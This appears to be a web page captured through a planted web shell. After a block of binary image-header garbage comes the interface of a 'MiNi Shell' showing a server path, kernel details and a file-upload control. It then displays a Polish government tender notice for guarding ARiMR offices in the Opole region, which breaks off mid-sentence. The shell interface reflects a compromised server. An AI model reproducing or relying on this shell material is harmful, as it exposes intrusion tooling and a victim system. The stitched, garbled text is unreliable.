JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241107/0058453301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony nieruchomości zajmowanych przez Agencję Restrukturyzacji i Modernizacji Rolnictwa w województwie opolskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AGENCJA RESTRUKTURYZACJI I MODERNIZACJI ROLNICTWA OPOLSKI ODDZIAŁ REGIONALNY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Opolski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01061308300036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wrocławska 170 G</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-836</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">opolski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Agencja płatnicza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony nieruchomości zajmowanych przez Agencję Restrukturyzacji i Modernizacji Rolnictwa w województwie opolskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-db3bae50-bb98-4272-bd8f-e8a16df7592e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00584533</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00094427/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.31 Usługa ochrony nieruchomości zajmowanych przez Agencję Restrukturyzacji i Modernizacji Rolnictwa w województwie opolskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z art. 67 ustawy<br/>Prawo zamówień publicznych informuje, że komunikacja pomiędzy Zamawiającym a Wykonawcami odbywać się będzie za<br/>pośrednictwem Platformy Zakupowej dostępnej na stronie internetowej https://platformazakupowa.pl/pn/arimr.<br/>Ponadto Zamawiający udostępnia informacje dotyczące<br/>formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych umożliwiających pracę na<br/>Platformie Zakupowej, tj.:<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s.<br/>2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje.<br/>3. Zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja 10.0.<br/>4. Włączona obsługa JavaScript.<br/>5. Zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>6. Platforma Zakupowa działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8.<br/>Wymagania techniczne i organizacyjne korespondencji elektronicznej zostały szczegółowo określone w Specyfikacji Warunków<br/>Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO (obowiązku informacyjnego) zostały przedstawione w Specyfikacji Warunków Zamówienia, która wraz z załącznikami jest dostępna na stronie internetowej prowadzonego postępowania pod adresem: https://platformazakupowa.pl/pn/arimr</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR08.2619.3.2024.DP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa ochrony fizycznej mienia i dozór dzienny nieruchomości zabudowanej Opolskiego<br/>Oddziału Regionalnego ARiMR wraz z usługą monitoringu elektronicznego z dojazdem załóg interwencyjnych, konserwacją<br/>lokalnych systemów alarmowych i przeciwpożarowych oraz systemów kontroli dostępu i systemu wizyjnego dla obiektów:<br/>11 Biur Powiatowych i Opolskiego Oddziału Regionalnego ARiMR w województwie opolskim oraz opcjonalnie: ochrona<br/>doraźna i interwencja doraźna oraz przeniesienie instalacji monitoringu do innego budynku.<br/>Zamawiający wymaga, aby wykonanie przedmiotu zamówienia nastąpiło na warunkach i zasadach określonych w<br/>projektowanych postanowieniach umowy wraz z załącznikami, stanowiących Załącznik nr 8 do SWZ. Szczegółowy opis<br/>przedmiotu zamówienia stanowi Załącznik nr 1 do SWZ.<br/>Zamówienie składa się z:<br/>- zamówienia podstawowego zgodnie z opisem zawartym w pkt 2.1, 2.2, 2.3 Załącznika nr 14 do projektowanych<br/>postanowień umowy (Tabela nr 1 Formularza ofertowego - Załącznik nr 2 do SWZ; Tabele nr 1-3 Formularza cenowego -<br/>Załącznik nr 3 do SWZ)<br/>oraz<br/>- zamówienia opcjonalnego zgodnie z opisem zawartym w pkt 2.4, 2.5, 2.6 Załącznika nr 14 do projektowanych postanowień<br/>umowy (Tabela nr 2 Formularza ofertowego - Załącznik nr 2 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">79713000-5 - Usługi strażnicze</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje tzw. prawo Opcji zakupu, zgodnie z art. 441 ust. 1 ustawy Pzp, które posiada fakultatywny<br/>charakter i nie stanowi zobowiązania Zamawiającego do jego udzielenia. Maksymalna wielkość zamówienia opcjonalnego wskazana została w pkt I.2.1.11 SWZ Tabeli nr 2 obejmującego świadczenie usług określonych w punktach 2.4- 2.6 Opisu przedmiotu zamówienia zwanego dalej: „OPZ” zawartego w treści Załącznika nr 1 do SWZ.<br/>Maksymalna wartość opcji:<br/>-przeniesienie instalacji monitoringu do innego budynku: 32 roboczogodziny<br/>- ochrona doraźna i interwencja doraźna: 120 roboczogodzin.<br/>W sytuacji nieskorzystania lub niewykorzystania całego zakresu prawa opcji, Wykonawcy nie przysługuje żadne roszczenie<br/>odszkodowawcze. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (P), przyznaną<br/>zgodnie ze wzorem: P=C+Z+G,<br/>gdzie:<br/>P – łączna liczba punktów ocenianej oferty ocenianej oferty (ocena końcowa)<br/>C – liczba punktów za łączną cenę ofertową (łączną wartość brutto)<br/>Z – liczba punktów przyznana w kryterium zatrudnienie na umowę o pracę osób niepełnosprawnych/ bezrobotnych<br/>G – liczba punktów przyznana w kryterium osiadanie własnej grupy interwencyjnej<br/>W kryterium „Łączna cena ofertowa - C” najwyższą liczbę punktów uzyska oferta z najniższą zaoferowaną ceną. Ocena punktowa w<br/>kryterium łączna cena ofertowa brutto dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę<br/>w ofercie i przeliczona według wzoru:<br/>C = Najniższa cena oferty brutto zaproponowana przez Wykonawców / Cena brutto oferty badanej x 60;<br/>Ocena punktowa w kryterium „Zatrudnienie na umowę o pracę osób niepełnosprawnych/ bezrobotnych – Z” dokonana zostanie na<br/>podstawie zadeklarowania przez Wykonawcę w ofercie zatrudnienia na umowę o pracę minimum jednej osoby będącej osobą<br/>niepełnosprawną / bezrobotną , do wykonania czynności określonych w pkt 2.1-2.3 OPZ – Załącznika nr 1 do SWZ.<br/>Punktacja przeliczona zostanie zgodnie ze wzorem:<br/>- Wykonawca, który zadeklaruje zatrudnienie 1 i więcej osób niepełnosprawnych/ bezrobotnych otrzyma – 20 punktów,<br/>- Wykonawca, który nie zadeklaruje zatrudnienia osób niepełnosprawnych/bezrobotnych otrzyma – 0 punktów;<br/>Ocena punktowa w kryterium „Posiadanie własnej grupy interwencyjnej - G” dokonana zostanie na podstawie zadeklarowania przez<br/>Wykonawcę w ofercie posiadania minimum jednej własnej grupy interwencyjnej wykonującej czynności określone w punkcie 2.1.3<br/>OPZ - Załącznika nr 1 do SWZ (tzn. bez zaangażowania Podwykonawców). Punktacja przeliczona zostanie zgodnie ze wzorem:<br/>- Wykonawca, który zadeklaruje posiadanie minimum 1 grupy interwencyjnej<br/>otrzyma – 20 punktów,<br/>- Wykonawca, który nie zadeklaruje posiadania własnej grupy interwencyjnej<br/>otrzyma – 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie na umowę o pracę osób niepełnosprawnych/ bezrobotnych - Z</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie własnej grupy interwencyjnej - G</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli wykaże, że<br/>posiada aktualną koncesję na prowadzenie działalności w zakresie usług ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz. U. z 2021 r. poz. 1995) w obszarze, w jakim mają być świadczone usługi dla Zamawiającego.<br/>Uwagi:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten zostanie uznany za spełniony, jeżeli minimum jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia i zrealizuje usługi, do których są one wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie<br/>wskazania, które usługi wykonają poszczególni Wykonawcy (członkowie konsorcjum), którego wzór stanowi Załącznik nr 5 do SWZ.<br/>Sytuacja ekonomiczna lub finansowa:<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli Wykonawca/ Podwykonawca wykaże, że posiada odpowiednie ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną 1 000.000,00 złotych brutto (słownie: jeden milion złotych),<br/>Uwagi:<br/>1) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek zostanie spełniony w przypadku, gdy co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że spełnia warunek w powyższym zakresie.<br/>2) W przypadku gdy suma ubezpieczenia zostanie wyrażona w obcej walucie, Zamawiający do określenia jej wartości w złotych polskich przyjmie średni kurs NBP obowiązujący w dniu wydania dokumentu przez ubezpieczyciela.<br/>3) Warunek udziału dot. wykazania posiadania przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej określoną przez Zamawiającego zostanie uznany za spełniony, jedynie w przypadku przedłożenia przez Wykonawcę Zamawiającemu polisy<br/>OC lub innego dokumentu potwierdzającego posiadanie ubezpieczenia opłaconego przed upływem terminu składania ofert.<br/>(Pod pojęciem „inny dokument” należy rozumieć inny niż polisa dokument potwierdzający zawarcie umowy ubezpieczenia, który poświadcza obligatoryjne elementy umowy ubezpieczenia. Z treści tego dokumentu lub z załączonego do niego dodatkowego dokumentu powinien wynikać fakt opłacenia przez Wykonawcę składki na ubezpieczenie zgodnie z treścią tej<br/>umowy, nie później niż do upływu terminu składania ofert).<br/>Zdolność techniczna lub zawodowa:<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu we wskazanym zakresie, jeżeli:<br/>a) Wykonawca wykaże, że należycie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 (jedną) usługę (tj. zrealizował co najmniej jedną umowę na świadczenie usług ochrony nieruchomości) porównywalną do przedmiotu zamówienia o wartości nie mniejszej niż 200 000,00 zł brutto oraz załączy dowody potwierdzające, że usługa została wykonana lub jest wykonywana należycie. Zamawiający poprzez użyte powyżej sformułowanie „porównywalną do przedmiotu zamówienia” w odniesieniu do należycie wykonanej/ wykonywanej usługi, rozumie usługę ochrony nieruchomości o takim samym stopniu trudności wykonania.<br/>Uwagi:<br/>1) Wykonawca może powołać się na doświadczenie w realizacji niezakończonych zamówień, w przypadku gdy zamówienie było podzielone na etapy lub partie, które zostały ostatecznie odebrane lub też w sytuacji gdy usługi obejmują świadczenia powtarzające się lub ciągłe, o których mowa w § 9 ust. 1 pkt 2 Rozporządzenia w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. 2020 poz. 2415 ze zm.).<br/>2) W przypadku gdy Wykonawca aktualnie wykonuje usługi Zamawiający uzna, że warunek w zakresie wiedzy i doświadczenia jest spełniony, jeżeli od rozpoczęcia realizacji usług do dnia wystawienia dowodu określającego czy te usługi są wykonywane należycie, wartość wykonanych usług w tym okresie odpowiada wartościom określonym odpowiednio do zamówienia, na które Wykonawca składa ofertę.<br/>3) Jeżeli wartość usługi wskazanej w wykazie jest podana w walucie innej niż PLN, Wykonawca zobowiązany jest, na potrzeby niniejszego postępowania, dokonać przeliczenia jej wartości na PLN wg średniego kursu NBP (www.nbp.pl tabela A – tabela kursów średnich walut obcych) z dnia zakończenia usługi o zakresie jak wyżej wraz z podaniem kursu oraz daty<br/>jego obowiązywania (zgodnie z tabelą A – tabela kursów średnich walut obcych) wg których dokonano przeliczenia; w przypadku usług nadal realizowanych - wg tabeli kursów średnich walut obcych z dnia rozpoczęcia realizacji danej usługi.<br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania, które usługi wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 5 do SWZ.<br/>Wykonawca oraz Podwykonawca wykaże, że dysponuje osobami, które skierowane zostaną do realizacji przedmiotowego zamówienia, posiadającymi wpis na listę kwalifikowanych pracowników ochrony fizycznej oraz kwalifikowanych pracowników zabezpieczenia technicznego zgodnie z art. 26 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. 2021 poz. 1995). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga:<br/>informacji z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108 ust. 1 pkt 1) i 2) ustawy Pzp <br/>b)	art. 108 ust. 1 pkt 4) ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>c)	art. 109 ust. 1 pkt 2) lit. a) ustawy Pzp,<br/>d) art. 109 ust. 1 pkt 2) lit. b) ustawy Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>e) art. 109 ust. 1 pkt 3) ustawy Pzp, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzono karę aresztu<br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp<br/>- sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>oświadczenia Wykonawcy 